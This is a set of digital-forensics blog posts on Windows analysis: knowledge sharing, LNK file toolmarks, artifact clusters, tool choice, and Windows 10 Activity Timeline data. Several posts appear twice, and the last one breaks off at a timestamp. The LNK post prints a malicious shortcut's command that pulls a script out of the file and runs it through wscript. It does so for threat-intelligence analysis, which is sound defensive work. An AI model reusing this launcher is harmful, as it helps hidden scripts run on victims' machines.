As 2019 closes, we move into not just a new year, but also a new decade. While, for the most part, this isn't entirely significant...after all, how different will you really be when you wake up on 2 Jan...times such as this offer an opportunity for reflection and for addressing those things what we may decide we need to change.
I blogged recently regarding Brett's thoughts on how to do about improving #DFIR skills, and to some extend, expanding on them from my own perspective. Then this morning, I was perusing one of the social media sites that I frequent, and came across a question regarding forensic analysis of "significant locations" on an iPhone 6. I really have no experience with smart phones or iOS, but I thought it would be interesting to take a quick look, so I did a Google search. The first result was an article that had been posted on the same social media site a year and a half ago.
I recently engaged with another analyst via social media, regarding recovering Registry hives from unallocated space. The analyst had specifically asked about FOSS tools, and in relatively short order, I found an 8 pg PDF document on the subject, written by Andrew Case. The document wasn't dated, but it did refer specifically to Windows XP, so that gave me some idea of the time frame as to when Andrew "put pen to paper", as it were. Interestingly, Andrew's paper made use of one of the FOSS tools the analyst asked about, so it worked out pretty well.
The industry is populated by the full spectrum of #DFIR folks, from those interested in the topic and enthusiasts, to folks for whom digital analysis work is part of their job but not an everyday thing, all the way through academics and highly dedicated professionals. There are those who don't "do" DFIR analysis all the time, and those whose primary role is to do nothing but digital analysis and research.
And there's always something new to learn, isn't there? There's always a question that needs to be answered, such as, "how do I recover an NTUSER.DAT hive from a deleted user profile?" I would go so far as to say that we all have questions such as these from time to time, and that some of us have the time to research these questions, and others don't. Some of us find applicable results pretty quickly, and some of us can spend a great deal of time searching for an answer, never finding anything that applies to what we're trying to accomplish. I know that's happened to me more times than I care to count.
The good news is that, in most cases, the information someone is seeking is out there. Someone knows it, and someone may have even written it down. The bad news is...the information is out there. If you don't have enough experience in the field or topic in question, you're likely going to have difficulty finding what you're looking for. I get it. For every time I run a Google search and the first half a dozen responses hit the nail squarely on the head, there are 5 or 6 searches where I've just not found anything of use...not because it doesn't exist but more likely due to my search terms.
Training can be expensive, and can require the attendee to be out of the office or off the bench for an extended period of time. And training my very often not cover those things for which we have questions. For example, throughout the past two decades, I've not only spoken publicly multiple times on the topic of Registry analysis, as well as written and conducted training courses (and even written books on the topic), but it never occurred to me that someone would want to recover the NTUSER.DAT hive from a deleted profile. And, even though I've asked multiple times over the years for feedback, even posing the question, "...what would you like to see covered/addressed?", not once has the topic of recovering deleted hives come up.
That is, until recently. Now, we have a need for "just in time training". The good news is that we have multiple resources available to us...Google, the Forensics Wiki, and Brett's DFIR Training site, to name a few. The down side is that even searching these sites in particular, you may not find what you're looking for.
So, for the coming year...nay, the coming decade...my request or "call to action" is for folks in the community to take more active steps in a couple of areas. First, develop purposeful, intentional relationships in the community. Go beyond following someone on social media, or clicking "Like" or "RT" to everything you see. Instead, connect with someone because you have a purposeful intention for doing so, and because you're aware of the value that you bring to the relationship. What this leads to is developing relationships based on trust, and subsequently, the sharing of tribal knowledge.
Second, actively take steps to maintain the knowledgebase. If you're looking for something, try the established repositories. If you can't find it there, but you do find an answer, and even if you end up building the answer yourself from bits and pieces, take active steps to ensure that what you found doesn't pass undocumented. I'll be the first to tell you that I haven't seen everything there is to see...I've never done a BEC investigation. There are a lot of ransomware infections I've never seen, nor investigated. My point is that we don't all see everything, but by sharing what we've experienced, we can ensure that more of us can benefit from each other's experiences. Jim Mattis, former Marine Corps warfighter and general officer, and former Secretary of Defense, stated in his recent book that our "own personal experiences are not broad enough to sustain [us]." This is 1000% true for warfighters, as well as for threat hunters, and forensic and intel analysts.
So, for the coming of the new year, resolve to take a more active role not just in learning new things, but adding to the knowledgebase of the community.
The Windows Incident Response Blog is dedicated to the myriad information surrounding and inherent to the topics of IR and digital analysis of Windows systems. This blog provides information in support of my books; "Windows Forensic Analysis" (1st thru 4th editions), "Windows Registry Forensics", as well as the book I co-authored with Cory Altheide, "Digital Forensics with Open Source Tools".
Pages
▼
Tuesday, December 31, 2019
Sunday, December 29, 2019
LNK Toolmarks
Matt posted a blog article a while back, and I took interest in large part because it involved an LNK file. Matt provided a hash for the file in question, as well as a walk-through of his "peeling of the onion", as it were. However, one of the things that Matt pointed out that still needed to be done was toolmark analysis.
In his article, Matt says that LNK file, "...stitch together the world between the attacker and the victim." He's right. When an actor sends an LNK file to a target, particularly as an email attachment, they are sharing evidence of their development environment, which can be used to track threat actors and their campaigns. This is facilitated by the fact that LNK files not only contain a great deal of metadata from the actor's dev environment that act as "toolmarks", but also due to the fact that the absence of portions of that metadata can also be considered "toolmarks", as well.
The metadata extracted from the LNK file Matt discussed is illustrated below:
File: d:\cases\lnk\foto
guid {00021401-0000-0000-c000-000000000046}
mtime Sat Sep 15 07:28:38 2018 Z
atime Thu Sep 26 22:40:14 2019 Z
ctime Sat Sep 15 07:28:38 2018 Z
workingdir %CD%
basepath C:\Windows\System32\cmd.exe
shitemidlist My Computer/C:\/Windows/System32/cmd.exe
**Shell Items Details (times in UTC)**
C:2018-09-15 06:09:28 M:2019-09-23 17:18:10 A:2019-09-26 22:31:52 Windows (9) [526/1]
C:2018-09-15 06:09:28 M:2019-05-06 20:04:58 A:2019-09-26 22:02:08 System32 (9) [2246/1]
C:2018-09-15 07:28:40 M:2018-09-15 07:28:40 A:2019-09-26 22:38:36 cmd.exe (9)
vol_sn D4DA-5010
vol_type Fixed Disk
commandline /c start "" explorer "%cd%\Foto" | powershell -NonInteractive -noLogo -c "& {get-content %cd%\Foto.lnk | select -Last 1 > %appdata%\_.vbe}" && start "" wscript //B "%appdata%\_.vbe"
iconfilename C:\Windows\System32\shell32.dll
hotkey 0x0
showcmd 0x7
***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasExpIcon|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath
As you can see, we have a good bit of what we'd expect to see in an LNK file, but there are also elements clearly absent, items we'd expect to see that just aren't there. For example, there are no Extra Data Blocks (confirmed by visual inspection), and as such, no MAC address, no machine ID (or NetBIOS name), etc. These missing pieces can be viewed as toolmarks, and we've seen where code executed by an LNK file has been appended to the end of the LNK file itself.
While this particular LNK file is missing a good bit of what we would expect to see, based on the file format, there is still a good bit of information available that can be used to develop a better intel picture. For example, the volume serial number is intact, and that can be used in a VirusTotal retro-hunt to locate other, perhaps similar LNK files. This would then give some insight into how often this particular technique (and dev system) seem to be in use and in play, and if the VirusTotal page for each file found contains some information about the campaign, on which it was seen, that might also be helplful.
What something like this illustrates is the need for tying DFIR work much closer to CTI, and even EDR/MSS. Some organizations still have these functions as separate business units, and this is particularly true within consulting organizations. In such instances, CTI resources do not have the benefit of accessing DFIR information (and to some extent, vice versa), minimizing the view into incidents and campaigns. Having the ability to fully exploit DFIR data, such as LNK files, and incorporating that information into CTI reporting produces a much richer picture, as evidenced by this FireEye write-up regarding Cozy Bear.
In his article, Matt says that LNK file, "...stitch together the world between the attacker and the victim." He's right. When an actor sends an LNK file to a target, particularly as an email attachment, they are sharing evidence of their development environment, which can be used to track threat actors and their campaigns. This is facilitated by the fact that LNK files not only contain a great deal of metadata from the actor's dev environment that act as "toolmarks", but also due to the fact that the absence of portions of that metadata can also be considered "toolmarks", as well.
The metadata extracted from the LNK file Matt discussed is illustrated below:
File: d:\cases\lnk\foto
guid {00021401-0000-0000-c000-000000000046}
mtime Sat Sep 15 07:28:38 2018 Z
atime Thu Sep 26 22:40:14 2019 Z
ctime Sat Sep 15 07:28:38 2018 Z
workingdir %CD%
basepath C:\Windows\System32\cmd.exe
shitemidlist My Computer/C:\/Windows/System32/cmd.exe
**Shell Items Details (times in UTC)**
C:2018-09-15 06:09:28 M:2019-09-23 17:18:10 A:2019-09-26 22:31:52 Windows (9) [526/1]
C:2018-09-15 06:09:28 M:2019-05-06 20:04:58 A:2019-09-26 22:02:08 System32 (9) [2246/1]
C:2018-09-15 07:28:40 M:2018-09-15 07:28:40 A:2019-09-26 22:38:36 cmd.exe (9)
vol_sn D4DA-5010
vol_type Fixed Disk
commandline /c start "" explorer "%cd%\Foto" | powershell -NonInteractive -noLogo -c "& {get-content %cd%\Foto.lnk | select -Last 1 > %appdata%\_.vbe}" && start "" wscript //B "%appdata%\_.vbe"
iconfilename C:\Windows\System32\shell32.dll
hotkey 0x0
showcmd 0x7
***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasExpIcon|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath
As you can see, we have a good bit of what we'd expect to see in an LNK file, but there are also elements clearly absent, items we'd expect to see that just aren't there. For example, there are no Extra Data Blocks (confirmed by visual inspection), and as such, no MAC address, no machine ID (or NetBIOS name), etc. These missing pieces can be viewed as toolmarks, and we've seen where code executed by an LNK file has been appended to the end of the LNK file itself.
While this particular LNK file is missing a good bit of what we would expect to see, based on the file format, there is still a good bit of information available that can be used to develop a better intel picture. For example, the volume serial number is intact, and that can be used in a VirusTotal retro-hunt to locate other, perhaps similar LNK files. This would then give some insight into how often this particular technique (and dev system) seem to be in use and in play, and if the VirusTotal page for each file found contains some information about the campaign, on which it was seen, that might also be helplful.
What something like this illustrates is the need for tying DFIR work much closer to CTI, and even EDR/MSS. Some organizations still have these functions as separate business units, and this is particularly true within consulting organizations. In such instances, CTI resources do not have the benefit of accessing DFIR information (and to some extent, vice versa), minimizing the view into incidents and campaigns. Having the ability to fully exploit DFIR data, such as LNK files, and incorporating that information into CTI reporting produces a much richer picture, as evidenced by this FireEye write-up regarding Cozy Bear.
Saturday, December 28, 2019
Improving DFIR Skills
There are more than a few skills that make up the #DFIR "field", and just one of them is conducting DFIR analysis. Brett Shavers recently shared his thoughts on how to improve in this area, specifically by studying someone else's case work. In his article, Brett lists a number of different avenues for reviewing work conducted by others a means of improving your own skills.
Brett and I are both Marine veterans, and Marines have a long history of looking to the experience of others to expand, extend, and improve our own capabilities. In the case of war fighting, a great deal has been written, providing a wealth of information to dig into and study. Jim Mattis stated in his book, "Call Sign Chaos", that "...your personal experiences alone are not broad enough to sustain you." This is true not only for a Marine general, but also for a DFIR analyst. In fact, I would say even more so for an analyst.
Okay, so how do we apply this? One way is to follow Brett's advice, and seek out resources. There are numerous web sites available, and another resource is David Cowen's book, Computer Forensics InfoSec Pro Guide.
Another available resource is Investigating Windows Systems. What makes this book different from others that you might find is that when writing it, my goal was to demonstrate stitching together the analysis process, by explaining why certain decisions were made, and the data and thought processes led to various findings. Rather than simply presenting a finding, I wanted to illustrate the data that was laid out before me when I made each of the analysis decisions. As with all of my other books, I wrote IWS in large part due to the fact that I couldn't find any book (or other resource) that took this approach.
Another approach is participating in CTFs. However, if you don't feel confident in participating in the actual CTF itself, but still want to take a shot at the analysis and see how others went about answering the challenge questions, there are often options available. In 2018, DefCon had a forensic analysis CTF, and a bit after the conference, several (I found 3) folks posted their take on the challenges.
My "thing" with CTFs is that they very often aren't 'real world'. For example, in all of my time as an incident responder, I've never had someone ask me to identify a disk signature or volume serial number from an acquired image. Can I? Sure. But it's never been part of the analysis process, in providing services to a customer. As such, I posted something of my own take on a few of the questions (here, and here), so they're available for anyone to read, and because the images are available, anyone can walk through what I or the other folks did, following along using their own tools and their own analysis processes.
If you do decide to engage in developing your skills, one of the best ways to do so is when you have someone to help you get over the humps. I'll admit it...sometimes, I take time to research something and may come up with a solution that isn't at all elegant, and could perhaps be done better. Or maybe, due to the fact that I'm relying on my own experiences, I don't see or consider something that to someone else, is obvious. Having a mentor, someone you can go to with questions and bounce ideas off of can be very beneficial in both the long and short term.
Brett and I are both Marine veterans, and Marines have a long history of looking to the experience of others to expand, extend, and improve our own capabilities. In the case of war fighting, a great deal has been written, providing a wealth of information to dig into and study. Jim Mattis stated in his book, "Call Sign Chaos", that "...your personal experiences alone are not broad enough to sustain you." This is true not only for a Marine general, but also for a DFIR analyst. In fact, I would say even more so for an analyst.
Okay, so how do we apply this? One way is to follow Brett's advice, and seek out resources. There are numerous web sites available, and another resource is David Cowen's book, Computer Forensics InfoSec Pro Guide.
Another available resource is Investigating Windows Systems. What makes this book different from others that you might find is that when writing it, my goal was to demonstrate stitching together the analysis process, by explaining why certain decisions were made, and the data and thought processes led to various findings. Rather than simply presenting a finding, I wanted to illustrate the data that was laid out before me when I made each of the analysis decisions. As with all of my other books, I wrote IWS in large part due to the fact that I couldn't find any book (or other resource) that took this approach.
Another approach is participating in CTFs. However, if you don't feel confident in participating in the actual CTF itself, but still want to take a shot at the analysis and see how others went about answering the challenge questions, there are often options available. In 2018, DefCon had a forensic analysis CTF, and a bit after the conference, several (I found 3) folks posted their take on the challenges.
My "thing" with CTFs is that they very often aren't 'real world'. For example, in all of my time as an incident responder, I've never had someone ask me to identify a disk signature or volume serial number from an acquired image. Can I? Sure. But it's never been part of the analysis process, in providing services to a customer. As such, I posted something of my own take on a few of the questions (here, and here), so they're available for anyone to read, and because the images are available, anyone can walk through what I or the other folks did, following along using their own tools and their own analysis processes.
If you do decide to engage in developing your skills, one of the best ways to do so is when you have someone to help you get over the humps. I'll admit it...sometimes, I take time to research something and may come up with a solution that isn't at all elegant, and could perhaps be done better. Or maybe, due to the fact that I'm relying on my own experiences, I don't see or consider something that to someone else, is obvious. Having a mentor, someone you can go to with questions and bounce ideas off of can be very beneficial in both the long and short term.
Wednesday, December 25, 2019
What is "best"?
A lot of times I'll see a question in DFIR-related social media, along the lines of, "what is the best tool to do X?" I've seen this a couple of times recently, perhaps the most recent being, "what is the best carving tool?" Nothing was started with respect to what was being carved (files, records, etc.), what the operating or file system in question was, etc. Just, "what is the best tool?"
I was recently searching online for a tire inflator. I live on a farm, and have a couple of tractors, a truck, and a horse trailer. I don't need a fully-functional air compressor, but I do need something portable and manageable for inflating tires, something both my wife and I can use not only around the farm, but also when we're on the road. As I began looking around at product reviews, I also started seeing those "best of" lists, where someone (marketing firm, editorial board, etc.) compiled a list of what they determined to be the "best" available of a particular product.
Understand that I have a pretty good idea of what I'm looking for, particularly with respect to features. I'm looking for something that can plug into the cigarette lighter in the truck or car, or to another power source, such as "house power" or a portable generator. I'm looking for something that can fill a tire to at least 100 psi (some tires go to 12 psi, others 90 psi), but I'm not super-concerned about the speed; my primary focus is ease of use, and durability. Being able to set the desired pressure and have it auto-stop would be very useful, but it's not a show-stopper.
Some of the inflators listed as "best" had to be connected directly to the vehicle battery. Yeah, I know...right? Not particularly convenient if my wife needs to add pressure to a tire, particularly when plugging into the cigarette lighter is much more convenient. I mean, really...how "convenient" is it to pull over to the side of the road, and have someone who hasn't used jumper cables to jump-start another vehicle connect an inflator to battery terminals? Some inflators not listed as "best" were considered to be "too expensive" (although no threshold for cost was provided as a basis for testing), and looking a bit more closely, those inflators allowed the user to connect to different power sources. Okay, so that sort of makes sense, but rather than say that the product is "too expensive", maybe list why. Another was described as "too heavy", although it weighed just 5 lbs (as opposed to the "best", which came in at just over 3 lbs).
Bringing this back to #DFIR, I ran across this article the other day, which reportedly provides a list of the "top 10 digital forensics consulting/services companies". A list of the companies is provided on the page, with a brief description of what each company does, but what really stood out for me is that the list is compiled by "a distinguished panel of prominent marketing specialists". This, of course, begs the question as to the criteria used to determine which companies were reviewed, and of those, which made the top 10.
In 2012, I attended a conference presentation where the speaker made comments about various tools, including RegRipper. One comment was, "RegRipper doesn't detect...", and that wasn't necessarily true. RegRipper was released in 2008 with the intention of being a community-driven tool. However, only a few have stepped up over the years to write and contribute plugins. RegRipper is capable of detecting a great deal (null bytes in key/value names, RLO char, etc.), and if your installation of RegRipper "doesn't detect" something, it's likely that (a) you haven't written the plugin, or (b) you haven't asked someone for help writing the plugin.
During that same presentation, the statement was made that "RegRipper does not scale to the enterprise". This is true. It is also true that it was never designed to do so. The use case for which RegRipper was written is still in active use today.
My point is simply this..."best" is relative. If you're asking the question (i.e., "..what is the best #DFIR tool to do X?"), then understand that, if you don't share your requirements, what you're going to get back is what's best for the respondent, if anything. No one wants to write an encyclopedia of all of the different approaches, and available tools. Although, I'm sure someone will be happy to link you to one. ;-)
When you're considering the best "tool", take a look at the process, and maybe consider the best approach. Sometimes it's not about the tool. Also, consider the what it is you're trying to accomplish (your goals), as well as other considerations, such as operating or file system, etc. If you're not comfortable with the command line, or would perhaps like to consider a GUI solution (because doing so makes for a good screen capture in a report), or if you require the use of a commercial (vs FOSS...some do) tool, be sure to take those details into consideration, and if you're asking a question online, share them, as well.
I was recently searching online for a tire inflator. I live on a farm, and have a couple of tractors, a truck, and a horse trailer. I don't need a fully-functional air compressor, but I do need something portable and manageable for inflating tires, something both my wife and I can use not only around the farm, but also when we're on the road. As I began looking around at product reviews, I also started seeing those "best of" lists, where someone (marketing firm, editorial board, etc.) compiled a list of what they determined to be the "best" available of a particular product.
Understand that I have a pretty good idea of what I'm looking for, particularly with respect to features. I'm looking for something that can plug into the cigarette lighter in the truck or car, or to another power source, such as "house power" or a portable generator. I'm looking for something that can fill a tire to at least 100 psi (some tires go to 12 psi, others 90 psi), but I'm not super-concerned about the speed; my primary focus is ease of use, and durability. Being able to set the desired pressure and have it auto-stop would be very useful, but it's not a show-stopper.
Some of the inflators listed as "best" had to be connected directly to the vehicle battery. Yeah, I know...right? Not particularly convenient if my wife needs to add pressure to a tire, particularly when plugging into the cigarette lighter is much more convenient. I mean, really...how "convenient" is it to pull over to the side of the road, and have someone who hasn't used jumper cables to jump-start another vehicle connect an inflator to battery terminals? Some inflators not listed as "best" were considered to be "too expensive" (although no threshold for cost was provided as a basis for testing), and looking a bit more closely, those inflators allowed the user to connect to different power sources. Okay, so that sort of makes sense, but rather than say that the product is "too expensive", maybe list why. Another was described as "too heavy", although it weighed just 5 lbs (as opposed to the "best", which came in at just over 3 lbs).
Bringing this back to #DFIR, I ran across this article the other day, which reportedly provides a list of the "top 10 digital forensics consulting/services companies". A list of the companies is provided on the page, with a brief description of what each company does, but what really stood out for me is that the list is compiled by "a distinguished panel of prominent marketing specialists". This, of course, begs the question as to the criteria used to determine which companies were reviewed, and of those, which made the top 10.
In 2012, I attended a conference presentation where the speaker made comments about various tools, including RegRipper. One comment was, "RegRipper doesn't detect...", and that wasn't necessarily true. RegRipper was released in 2008 with the intention of being a community-driven tool. However, only a few have stepped up over the years to write and contribute plugins. RegRipper is capable of detecting a great deal (null bytes in key/value names, RLO char, etc.), and if your installation of RegRipper "doesn't detect" something, it's likely that (a) you haven't written the plugin, or (b) you haven't asked someone for help writing the plugin.
During that same presentation, the statement was made that "RegRipper does not scale to the enterprise". This is true. It is also true that it was never designed to do so. The use case for which RegRipper was written is still in active use today.
My point is simply this..."best" is relative. If you're asking the question (i.e., "..what is the best #DFIR tool to do X?"), then understand that, if you don't share your requirements, what you're going to get back is what's best for the respondent, if anything. No one wants to write an encyclopedia of all of the different approaches, and available tools. Although, I'm sure someone will be happy to link you to one. ;-)
When you're considering the best "tool", take a look at the process, and maybe consider the best approach. Sometimes it's not about the tool. Also, consider the what it is you're trying to accomplish (your goals), as well as other considerations, such as operating or file system, etc. If you're not comfortable with the command line, or would perhaps like to consider a GUI solution (because doing so makes for a good screen capture in a report), or if you require the use of a commercial (vs FOSS...some do) tool, be sure to take those details into consideration, and if you're asking a question online, share them, as well.
Tuesday, December 03, 2019
Artifact Clusters
Very often within the DFIR community, we see information shared (usually via blog posts) regarding a "new" artifact that has been recently unearthed, or simply being addressed for the first time. In some cases, the artifact is new to us, and in others, it may be the result of some new feature added to the Windows operating system or to an application. Sometimes when we see this new artifact discussed, a tool is shared to parse and make sense of the data afforded by that artifact. In some cases, we may find that multiple tools are available for parsing the same artifact, which is great, because it shows interest and diversity in the approach to accessing and making use of the data.
However, what we don't often see is how that artifact relates to other artifacts from the same system. Another way to look at it is, we don't often see how the tool, or more importantly, the data available in the source, can serve us to further an investigation. We may be left thinking, "Great, there's this data source, and a tool that allows me to extract and make some sense of the data within it, but how do I use it as part of an investigation?"
I shared an initial example of what this might look like recently in a recent blog post, and this was also the approach I took when I wrote about the investigations in Investigating Windows Systems. I hadn't seen any books available that covered the topic of digital forensic analysis (as opposed to just parsing data) from an investigation-wide perspective, completing an investigation using multiple artifacts to "tell the story". The idea was (and still is) that a single artifact, or a single entry derived from a data source, does NOT tell the whole story of the investigation. A single artifact may be a high fidelity indicator that provides a starting point for an investigation, but it does not tell the whole story. Rather than a single artifact, analysts should be looking at artifact clusters to provide the necessary context for an analyst to make a finding as to what happened.
Artifact clusters provide two things to the investigator; validation and context. Artifact clusters provide validation by reinforcing that an event occurred, or that the user took some action. That validation may be a duplicate event; in my previous blog post, we see the following events in our timeline:
Wed Nov 20 20:09:28 2019 Z
TIMELINE - Start Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
REG - [Program Execution] UserAssist - {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office14\WINWORD.EXE (5)
What we see here (above) are duplicate events that provide validation. We see via the UserAssist data that the user launched WinWord.exe, and we also see validation from the user's Activity Timeline database. Not only do we have validation, but we can also see what the artifact cluster should look like, and as such, have an understanding of what to look for in the face of anti-forensics efforts, be they intentional or the result of natural evidence decay.
In other instances, validation may come in the form of supporting events. For example, again from my previous blog post, we see the following two events side-by-side in the timeline:
Wed Nov 20 22:50:02 2019 Z
REG - RegEdit LastKey value -> Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\TaskFlow
TIMELINE - End Time:Windows\regedit.exe
In this example, we see that the user closed the Registry Editor, and that the user's LastKey value was set, illustrating the key that was in focus when the Registry Editor was closed. Rather than being duplicate events, these two events support each other.
Looking at different event sources during the same time period also helps us see the context of the events, as we get a better view of the overall artifact cluster. For example, consider the above timeline entries that pertain to the Registry Editor. With just the data from the Registry, we can see when the Registry Editor was closed, and the key that was in focus when it was closed. But that's about all we know.
However, if we add some more of the events from the overall artifact cluster, we can see not just when, but how the Registry Editor was opened, as illustrated below:
Wed Nov 20 22:49:11 2019 Z
TIMELINE - Start Time:Windows\regedit.exe
Wed Nov 20 22:49:07 2019 Z
REG - [Program Execution] UserAssist - {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)
REG - [Program Execution] UserAssist - {0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Administrative Tools\Registry Editor.lnk (1)
From a more complete artifact cluster, we can see that the user had the Registry Editor open for approximately 51 seconds. Information such as this can provide a great deal of context to an investigation.
Evidence Oxidation
Artifact clusters give us a view into the data in the face of anti-forensics, either as dedicated, intentional, targeted efforts to remove artifacts, or as natural evidence decay or oxidation.
Wait...what? "Evidence oxidation"? What is that? I shared some DFIR thoughts on Twitter not long ago on this topic, and in short, what this refers to is the natural disappearance of items from artifact clusters due to the passage of time, as some of those artifacts are removed or overwritten as the system continues to function. This is markedly different from the purposeful removal of artifacts, such as Registry keys being specifically and intentionally modified or deleted.
This idea of "evidence decay" or "evidence oxidation" begins with the Order of Volatility, which lists different artifacts based on their "lifetime"; that is to say that different artifacts age out or expire at different rates. For example, a process executed in memory will complete (often with seconds, or sooner) and the memory used by that process will be freed for use by another process in fairly short order. That process may result in the operating system or application generating an entry into a log file, which itself may roll over or be overwritten at various rates (i.e., the entry itself is overwritten as newer entries are added), depending upon the logging mechanism. Or, a file may be created within the file system that exists until someone...a person...purposefully deletes it. Even then, the contents of the file may exist (NTFS resident file, etc.) for a time after the file is marked as "not in use", something that may be dependent upon the file system in use, the level of activity on the system, whether a backup mechanism (backup, Volume Shadow Copy, etc.) occurred between the file creation and deletion times, etc.
In short, some artifacts may have the life span of a snowflake, or a fruit fly, or a tortoise. The life span of an artifact can depend upon a great deal; the operating system (and version) employed, the file system structure, the auditing infrastructure, the volume of usage of the system, etc. Consider this...I was once looking at a USN Change Journal from an image acquired from a Windows 7 system, and the time span of the available data was maybe a day and a half. Right around that time, a friend of mine contacted me about a Windows 2003 system he was examining, for which the USN Change Journal contained 90 days worth of data.
Windows systems can be very active, even when they appear to be sitting idle with no one actively typing at the keyboard. The operating system itself may reach out for updates, during which files are downloaded, processes are executed, and files are deleted. The same is true for a number of applications. Once a user becomes active on the system, the volume of activity and changes may increase dramatically. I use several applications (Notepad++, UltraEdit, VirtualBox, etc.) that all reach out to the Internet to look for updates when they're launched. Just surfing the web causes browser history to be generated and cached.
However, what we don't often see is how that artifact relates to other artifacts from the same system. Another way to look at it is, we don't often see how the tool, or more importantly, the data available in the source, can serve us to further an investigation. We may be left thinking, "Great, there's this data source, and a tool that allows me to extract and make some sense of the data within it, but how do I use it as part of an investigation?"
I shared an initial example of what this might look like recently in a recent blog post, and this was also the approach I took when I wrote about the investigations in Investigating Windows Systems. I hadn't seen any books available that covered the topic of digital forensic analysis (as opposed to just parsing data) from an investigation-wide perspective, completing an investigation using multiple artifacts to "tell the story". The idea was (and still is) that a single artifact, or a single entry derived from a data source, does NOT tell the whole story of the investigation. A single artifact may be a high fidelity indicator that provides a starting point for an investigation, but it does not tell the whole story. Rather than a single artifact, analysts should be looking at artifact clusters to provide the necessary context for an analyst to make a finding as to what happened.
Artifact clusters provide two things to the investigator; validation and context. Artifact clusters provide validation by reinforcing that an event occurred, or that the user took some action. That validation may be a duplicate event; in my previous blog post, we see the following events in our timeline:
Wed Nov 20 20:09:28 2019 Z
TIMELINE - Start Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
REG - [Program Execution] UserAssist - {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office14\WINWORD.EXE (5)
What we see here (above) are duplicate events that provide validation. We see via the UserAssist data that the user launched WinWord.exe, and we also see validation from the user's Activity Timeline database. Not only do we have validation, but we can also see what the artifact cluster should look like, and as such, have an understanding of what to look for in the face of anti-forensics efforts, be they intentional or the result of natural evidence decay.
In other instances, validation may come in the form of supporting events. For example, again from my previous blog post, we see the following two events side-by-side in the timeline:
Wed Nov 20 22:50:02 2019 Z
REG - RegEdit LastKey value -> Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\TaskFlow
TIMELINE - End Time:Windows\regedit.exe
In this example, we see that the user closed the Registry Editor, and that the user's LastKey value was set, illustrating the key that was in focus when the Registry Editor was closed. Rather than being duplicate events, these two events support each other.
Looking at different event sources during the same time period also helps us see the context of the events, as we get a better view of the overall artifact cluster. For example, consider the above timeline entries that pertain to the Registry Editor. With just the data from the Registry, we can see when the Registry Editor was closed, and the key that was in focus when it was closed. But that's about all we know.
However, if we add some more of the events from the overall artifact cluster, we can see not just when, but how the Registry Editor was opened, as illustrated below:
Wed Nov 20 22:49:11 2019 Z
TIMELINE - Start Time:Windows\regedit.exe
Wed Nov 20 22:49:07 2019 Z
REG - [Program Execution] UserAssist - {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)
REG - [Program Execution] UserAssist - {0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Administrative Tools\Registry Editor.lnk (1)
From a more complete artifact cluster, we can see that the user had the Registry Editor open for approximately 51 seconds. Information such as this can provide a great deal of context to an investigation.
Evidence Oxidation
Artifact clusters give us a view into the data in the face of anti-forensics, either as dedicated, intentional, targeted efforts to remove artifacts, or as natural evidence decay or oxidation.
Wait...what? "Evidence oxidation"? What is that? I shared some DFIR thoughts on Twitter not long ago on this topic, and in short, what this refers to is the natural disappearance of items from artifact clusters due to the passage of time, as some of those artifacts are removed or overwritten as the system continues to function. This is markedly different from the purposeful removal of artifacts, such as Registry keys being specifically and intentionally modified or deleted.
This idea of "evidence decay" or "evidence oxidation" begins with the Order of Volatility, which lists different artifacts based on their "lifetime"; that is to say that different artifacts age out or expire at different rates. For example, a process executed in memory will complete (often with seconds, or sooner) and the memory used by that process will be freed for use by another process in fairly short order. That process may result in the operating system or application generating an entry into a log file, which itself may roll over or be overwritten at various rates (i.e., the entry itself is overwritten as newer entries are added), depending upon the logging mechanism. Or, a file may be created within the file system that exists until someone...a person...purposefully deletes it. Even then, the contents of the file may exist (NTFS resident file, etc.) for a time after the file is marked as "not in use", something that may be dependent upon the file system in use, the level of activity on the system, whether a backup mechanism (backup, Volume Shadow Copy, etc.) occurred between the file creation and deletion times, etc.
In short, some artifacts may have the life span of a snowflake, or a fruit fly, or a tortoise. The life span of an artifact can depend upon a great deal; the operating system (and version) employed, the file system structure, the auditing infrastructure, the volume of usage of the system, etc. Consider this...I was once looking at a USN Change Journal from an image acquired from a Windows 7 system, and the time span of the available data was maybe a day and a half. Right around that time, a friend of mine contacted me about a Windows 2003 system he was examining, for which the USN Change Journal contained 90 days worth of data.
Windows systems can be very active, even when they appear to be sitting idle with no one actively typing at the keyboard. The operating system itself may reach out for updates, during which files are downloaded, processes are executed, and files are deleted. The same is true for a number of applications. Once a user becomes active on the system, the volume of activity and changes may increase dramatically. I use several applications (Notepad++, UltraEdit, VirtualBox, etc.) that all reach out to the Internet to look for updates when they're launched. Just surfing the web causes browser history to be generated and cached.
Thursday, November 28, 2019
ActivitesCache.db vs NTUSER.DAT
I recently had an opportunity to work with the data available in the Windows 10 Activity Timeline, or ActivitiesCache.db file. I'd seen a number of descriptions of the file contents, as well as descriptions of tools, but few of these are from the perspective of a DFIR analyst/responder, and none that I could find provided a view of how the data from the database stands up alongside other data sources an analyst might examine.
First, I grabbed a copy of my own ActivitiesCache.db file:
esentutil /y /vss\ActivitiesCache.db /d ActivitiesCache.db
Then I grabbed a copy of my NTUSER.DAT hive:
reg save HKCU NTUSER.DAT
I used Eric Zimmerman's WxTCmd tool to parse the database; from the output, I got two CSV files (as described in Eric's blog post for the tool), one for the Activity table. I then wrote a Perl script to translate elements of the Activity table into the 5-field TLN timeline format that I use for analysis. This way, I was able to do something of a side-by-side comparison of data from the NTUSER.DAT hive with the contents of the ActivitiesCache.db database. Specifically, I created a timeline using the TLN variants of the UserAssist, RecentDocs, Applets, MSOffice and RecentApps RegRipper plugins, and then added the Activity table data to the events file before parsing it into a timeline.
What I found was pretty interesting.
For one, the data from the Activities table illustrated some interesting activity. For example, here's what the data looks like for when I opened a PDF document from my desktop:
Wed Nov 20 23:04:15 2019 Z
